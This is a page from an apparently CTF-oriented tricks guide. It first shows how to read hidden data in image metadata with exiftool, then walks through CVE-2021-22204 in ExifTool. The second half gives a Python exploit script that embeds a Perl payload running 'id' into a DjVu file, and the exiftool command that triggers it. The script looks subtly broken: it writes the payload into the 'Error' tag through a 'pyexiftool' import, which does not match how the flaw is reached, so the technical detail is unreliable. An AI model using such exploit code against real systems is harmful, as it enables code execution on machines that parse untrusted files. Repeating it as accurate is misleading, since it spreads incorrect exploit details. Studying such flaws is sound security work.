> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-6/steganography/trick-0323.md).

# Extract Data Via Exiftool Comment

***

Use `exiftool` to inspect an image file's metadata. This displays various fields, including potentially hidden information within sections like the comment field.

```bash
exiftool <image_file.jpg>
```

Carefully review the output for any suspicious or out-of-place data, particularly in fields such as `Comment`, `UserComment`, or other less common tags.

Beyond simple inspection, it's critical to be aware of the risks associated with processing metadata from untrusted sources. The vulnerability, identified as CVE-2021–22204, is a critical arbitrary code execution flaw in ExifTool versions prior to 12.24. It stems from improper input validation when parsing DjVu files, specifically within certain metadata tags like `Error`, `Warning`, and DjVu tags such as `ANT`. The vulnerability lies in how ExifTool processes these tags using the Perl `eval` function, which executes arbitrary code embedded within the tag values.

Attackers could craft a DjVu file containing malicious Perl code embedded within one of these vulnerable tags. We can craft a malicious DjVu file using a Python script that leverages a library like `pyexiftool` to embed a malicious payload in a tag like the `Error` tag.

```python
import pyexiftool
import sys

if len(sys.argv) < 3:
    print("Usage: python create_malicious_djvu.py <template_djvu_file> <output_file>")
    sys.exit(1)

template_file = sys.argv[1]
output_file = sys.argv[2]

# Example payload: execute 'id' command using Perl's system function
# q{...} is a Perl quoting mechanism
payload = "q{;system('id');}"

with pyexiftool.ExifTool() as et:
    # Copy metadata from template and add/modify the Error tag with the payload
    et.execute(f"-tagsFromFile", template_file, f"-Error={payload}", output_file)

print(f"Created malicious DjVu file: {output_file}")
```

This script takes a template DjVu file and an output filename, embedding the specified Perl payload into the `Error` tag of the new file. The payload `q{;system('id');}` is an example that would execute the `id` command on the system processing the file.

When a vulnerable version of ExifTool processed this file, the embedded Perl code would be executed. Simply running `exiftool` on the crafted file could trigger the execution:

```bash
exiftool malicious.djvu
```

This demonstrated how simply processing a file with malicious metadata could lead to code execution, highlighting the importance of using updated versions and being cautious with files from untrusted origins.
